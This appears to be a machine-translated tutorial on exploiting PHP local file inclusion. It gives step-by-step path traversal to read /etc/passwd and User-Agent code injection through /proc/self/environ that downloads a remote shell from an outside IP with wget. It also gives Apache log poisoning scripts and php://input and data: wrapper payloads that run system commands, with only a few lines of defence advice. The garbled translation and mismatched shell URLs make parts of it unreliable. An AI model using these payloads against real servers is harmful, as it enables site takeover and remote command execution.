I just captured the LFI (Local File Include, Local File inclusion) attack from the website access log. The attack parameter is .. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. // proc/self/environ00:
Capture LFI attacks-Local File Include Local File inclusion
How to Use LFI (Local File Include, Local File inclusion) attacks?
Step 1: Find the local Inclusion Vulnerability first find a file that may exist locally and check it
For example: www.website.com/view.php? Page = contact. php
Replace it with www.website.com/view.php? Page = ../
We get an error
1 |
Warning: include(../) [function.include]: failed to open stream: No such fileor directory in /home/sirgod/public_html/website.com/view.php on line 1337 |
The translation error information is as follows:
Warning: including (../) [function. include]: failed to open the stream: No file or directory in/home/sirgod/public_html/website.com/view.php
It indicates that there is a great opportunity, but there is no file.
Then we will check the files on the server, such as/etc/passwd in linux.
Submit
1 |
url:www.website.com/view.php?page=../../../etc/passwd |
Still:
1 |
Warning: include(../) [function.include]: failed to open stream: No such fileor directory in /home/sirgod/public_html/website.com/view.php on line 1337 |
So we add the ../test layer by layer until the display ends.
1 |
www.website.com/view.php?page=../../../../../etc/passwd |
At this time, we have successfully included/etc/passwd
1 |
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0perator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin |
Step 2: Check whether proc/self/environ is available for access submission
1 |
url:www.website.com/view.php?page=../../../../../proc/self/environ |
If the following information is displayed:
1 |
DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=../../../../../../proc/self/environ REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=../../../../../../proc/self/environ SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE= |
2 |
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.website.com Port 80 |
| |
|
|
It indicates that it can be accessed. If a blank page is returned, it indicates that it cannot be accessed, or the operating system may be FreeBSD.
Step 3: How can we inject malicious code into proc/self/environ?
We can inject our code in the user proxy HTTP header.
Use the tamper data plug-in for Firefox to change Firefox's User-Agent.Start tamper data and request URL:
1 |
www.website.com/view.php?page=../../../../../proc/self/environ |
Select User-Agent to write the following code:
1 |
<?system('wget http://61.164.38.24/rfi.txt -O hack.php');?> |
Or
1 |
<?php copy('http://61.164.38.24/rfi.txt', 'hack.php') ?> |
Then, submit the request.
Our command will be executed (We will download http://hack-bay.com/shells/gny.txt, and save it as a token in shell.php
Website directory), and our shell will be created. If not, try to use exec (), because the system may be disabled from the php. ini network server.
Step 4: Access our shell Methods To prevent LFI attacks 1. involved dangerous functions (include (), require () and include_once (), require_once ())
When calling these functions, use explicit parameters whenever possible. If variables are used as parameters, the variables must be explicitly initialized to prevent the variables from being changed by the URL.
2. Disable dangerous php functions such as system.
How does PHP contain vulnerabilities? Php contains vulnerability Substitution Technology php developers make a basic mistake of passing an improper variable to the system function, especially the include () and require () functions.
This common error leads to the well-known Remote File Inclusion Vulnerability and local File Inclusion Vulnerability. In the past few years, php has begun to try to eliminate or limit the impact of this vulnerability through default settings.
However, even a simple local file contains new technologies that exploit these vulnerabilities to execute remote commands.
To introduce the vulnerability File Inclusion vulnerability in php, find a method to include files with your php malicious code.
1 |
<?php |
2 |
include($_GET['content']); |
Www.2cto.com
5 |
http://target/index.php?content=/etc/passwd |
6 |
|
7 |
|
8 |
http://target/index.php?content=http://trojan/exec.php |
This is the first example. It contains a local file/etc/pa sswd. The second example contains a remote file, which is not available in most cases, because allow_url_fopen in php settings is off by default.
Of course, the php code with this vulnerability is more restrictive than the above example. It is usually to add a directory in front to prevent Remote File Inclusion, add a file extension to restrict the types of files that can be included.
1 |
<?php |
2 |
include("pages/".$_GET['content'].".php"); |
5 |
http://target/index.php?content=../../../etc/passwd%00 |
... /Allows horizontal directory operations, allowing you to operate files in directories other than directories in the code.
If open_basedir is set to on in php, it will prevent you from bypassing too many directories.
Website developers may also use some functions to filter out malicious data submitted by users, but this is not always the case.
The Null Byte Character % 00 (\ 0) terminates the string to cut off anything submitted after it, that is, when magic_quotes_gpc is on by default, it can also escape.
A http://ush.it website named PHP File System Attack media provides a possible way to handle NULL byte characters.
Php Script Security may also depend on variables such as $ _ GLOBAL [] or $ _ SERVER, for example, a phplist Vulnerability (phplist is a foreign Email program) has been discovered recently.
Http: // target/phplist/admin /? _ SERVER [ConfigFile] =/etc/passwd
If you find a local inclusion vulnerability when executing a local file containing the remote code, you need to find a way to insert your malicious php code into a file, A large number of technologies have emerged in the past few years.
One technology that injects php code into service logs is later than the preceding vulnerabilities.
It is possible to insert our code into the header of the http request and then contain the Apache access_log log file (it may perform some tests to find access_log ).
Consider this example. In the Apache/PHP default configuration of Mac OS X, it may be necessary to write a script to send a request, because the browser may escape some characters.
1 |
<?php |
2 |
$a = fsockopen("localhost",80); |
3 |
fwrite($a,"GET /<?php passthru(\$_GET['cmd']); ?> HTTP/1.1\r\n". |
4 |
"Host: localhost\r\n". |
5 |
"Connection: Close\r\n\r\n"); |
6 |
fclose($a); |
9 |
http://localhost/index.php?content=/var/log/httpd/access_log&cmd=id |
Another method is to include the/proc/self/environ file of the Apache/PHP process environment variable.
If we insert malicious code into the User-Agent header, the code will appear in that file, so remote code execution is possible.
/Proc/self/environ must be readable
1 |
<?php |
2 |
$a = fsockopen("localhost",80); |
3 |
fwrite($a,"GET /../../../../proc/self/environ HTTP/1.1\r\n". |
4 |
"User-Agent: <?php passthru(\$_GET['cmd']); ?>\r\n". |
5 |
"Host: localhost\r\n". |
6 |
"Connection: Close\r\n\r\n"); |
Another way to exploit the include function of Php to encapsulate inclusion vulnerabilities is to use php encapsulation (http://www.php.net/wrappers.php ). In this example, PHP is used to input raw data from an http post request and execute it:
Vulnerability code:
1 |
<?php |
2 |
include($_GET['content']); |
Our request:
01 |
<?php |
02 |
$request = "<?php passthru('id;');?>"; |
03 |
$req = "POST /index.php?content=php://input |
04 |
HTTP/1.1\r\n". |
05 |
"Host: localhost\r\n". |
06 |
"Content-type: text/html\r\n". |
07 |
"Content-length: ".strlen($request)."\r\n". |
08 |
"Connection: Close\r\n\r\n". |
09 |
"$request \r\n\r\n"; |
10 |
$a = fsockopen("10.0.2.2",80); |
11 |
fwrite($a,$req); |
12 |
echo $req; |
13 |
while (!feof($a)){echo fgets($a, 128);} |
14 |
fclose($a); |
Result: uid = 33 (www-data) gid = 33 (www-data) groups = 33 (www-data)
The premise of this example is that the options allow_url_include and allow_fopen_include are set to ON. In this case, standard Remote File Inclusion is possible.
The advantage of this method is that it does not depend on the external storage file server.
Cr0w-at.blogspot.com mentions another technology that uses "data:" encapsulation:
1 |
index.php?content=data:,<?php system($_GET[c]);?>?&c=dir |
Or base64 encoded:
1 |
index.php?content=data:;base64,\PD9waHAgc3lzdGVtKCRfR0VUW2NdKTsgPz4=&c=dir |
To sum up, most of these methods are not new and do not show any defects or limitations in the PHP language itself. These problems can usually be solved through powerful input verification, common sense coding, and more rigorous server configuration prevention.
